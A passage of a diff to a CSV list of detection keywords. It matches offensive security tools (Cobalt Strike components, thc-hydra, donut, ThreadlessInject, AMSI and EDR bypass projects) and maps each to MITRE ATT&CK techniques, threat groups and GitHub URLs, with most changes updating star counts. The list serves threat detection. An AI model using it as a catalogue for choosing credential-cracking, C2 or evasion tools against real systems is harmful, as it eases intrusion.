Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*tgsrepcrack.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" @@ -17638,27 +17822,27 @@ "*tgtParse.py *","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*th3rd/heroinn*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*TH3xACE/EDR-Test*","offensive_tool_keyword","EDR-Test","Automating EDR Testing with reference to MITRE ATTACK via Cobalt Strike [Purple Team].","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/TH3xACE/EDR-Test","1","1","N/A","N/A","2","140","19","2023-03-27T11:39:32Z","2022-03-27T08:58:49Z" -"*thc-hydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*thc-hydra.git*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*thc-hydra.git*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*the-backdoor-factory-master*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*thc-hydra*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*thc-hydra.git*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*thc-hydra.git*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*the-backdoor-factory-master*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "*TheD1rkMtr/AMSI_patch*","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","126","27","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*TheD1rkMtr/D1rkInject*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" -"*TheD1rkMtr/DocPlz*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*TheD1rkMtr/DocPlz*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" "*TheD1rkMtr/GithubC2*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*TheD1rkMtr/HeapCrypt*","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","1","N/A","9","3","224","40","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z" "*TheD1rkMtr/NTDLLReflection*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*TheD1rkMtr/Pspersist*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" -"*TheD1rkMtr/Shellcode-Hide*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","296","75","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*TheD1rkMtr/Shellcode-Hide*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*TheD1rkMtr/StackCrypt*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" -"*TheD1rkMtr/UnhookingPatch*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*TheD1rkMtr/UnhookingPatch*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*TheGejr/SpringShell*","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/TheGejr/SpringShell","1","1","N/A","N/A","2","124","86","2022-04-04T14:09:11Z","2022-03-30T17:05:46Z" -"*theHarvester*","offensive_tool_keyword","theHarvester","E-mails. subdomains and names Harvester.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/laramies/theHarvester","1","0","N/A","N/A","10","9250","1843","2023-10-02T22:12:14Z","2011-01-01T20:40:15Z" -"*thelinuxchoice/tweetshell*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" -"*ThemeBleed.exe *","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","27","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" +"*theHarvester*","offensive_tool_keyword","theHarvester","E-mails. subdomains and names Harvester.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/laramies/theHarvester","1","0","N/A","N/A","10","9256","1843","2023-10-02T22:12:14Z","2011-01-01T20:40:15Z" +"*thelinuxchoice/tweetshell*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*ThemeBleed.exe *","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","143","28","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*ThePorgs/Exegol-images*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*therealwover@protonmail.com*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*thewover/donut*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*therealwover@protonmail.com*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*thewover/donut*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" "*thief.py -*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*third_party/SharpGen*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*third-party*winvnc*.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" @@ -17667,36 +17851,36 @@ "*thoth.py -*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*thoth-master.zip*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*Thread_Hiijack_Inject_Load.*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z" -"*ThreadlessInject* -p * -d *","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","552","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" -"*ThreadlessInject.exe*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","552","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" -"*ThreadlessInject-master*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","552","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*ThreadlessInject* -p * -d *","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*ThreadlessInject.exe*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" +"*ThreadlessInject-master*","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","6","553","55","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*threads all alertable*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ThreadStackSpoofer*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*ThreatCheck.csproj*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "*ThreatCheck.csproj*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" -"*ThreatCheck.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*ThreatCheck.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*ThreatCheck.exe*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "*ThreatCheck-master*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" "*threatexpress*","offensive_tool_keyword","Github Username","github repo hosting post exploitation tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/threatexpress","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*threatexpress*malleable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*threatexpress*malleable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "*threatexpress/cs2modrewrite*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 